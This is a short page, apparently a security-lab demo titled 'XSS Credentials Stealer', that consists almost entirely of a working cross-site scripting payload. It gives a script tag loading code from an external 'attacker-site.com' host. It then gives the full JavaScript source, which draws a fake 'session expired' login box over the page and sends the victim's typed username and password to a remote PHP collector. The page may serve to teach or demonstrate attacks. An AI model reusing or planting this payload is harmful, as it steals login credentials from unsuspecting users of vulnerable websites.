AppSec Labs - XSS Credentials Stealer
Example page:
View stolen credentials:
XSS Phishing Payload:
<script src="http://online.attacker-site.com/cred_stealer/cred_stealer.js"></script>

Payload Source:
function handle_login()
{
var username = document.querySelector("#tr_username").value;
var password = document.querySelector("#tr_password").value;
var target_url = "http://online.attacker-site.com/cred_stealer/cred_stealer.php";
var xhttp = new XMLHttpRequest();
xhttp.open("POST", target_url, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = true;
xhttp.send("username="+username+"&password="+password);

var parent = document.getElementById("aa11");
var child = document.getElementById("aa22");
parent.removeChild(child);
}

document.body.innerHTML += '<div id="aa11"><div id="aa22"><div id="greyoutbg" style=" opacity: 0.5; background: #000; width: 100%;height: 100%; z-index: 99999999;top: 0; left: 0; position: fixed; "></div><div id="cred_box" style="font-family: Tahoma; background-color:#FFF; position: fixed; width: 500px; top: 50%; left: 50%; margin-top: -180px; margin-left: -250px; z-index: 999999999; box-shadow: 0 0 20px #000; border: 1px solid #000"><div id="error_message" style="width: 400px; margin: 20px auto; background-color: #ff9999; border: 1px solid red; font-weight:bold; padding:10px">Your session has expired, please login again to continue.</div><div id="input_creds" style="width: 400px; margin: 20px auto;"><div style="font-weight:bold; width:100px; display:inline-block">Username:</div><input id="tr_username" style="width: 150px; padding: 5px; margin-bottom: 10px"type="text"><br><div style="font-weight:bold; width:100px; display:inline-block">Password:</div><input id="tr_password" style="width: 150px; padding: 5px; margin-bottom: 10px" type="password"><br><button type="button" onclick="handle_login()" style="margin: 10px 0 0 0; padding:10px 20px; width: 100px">Login</button></div></div></div></div>';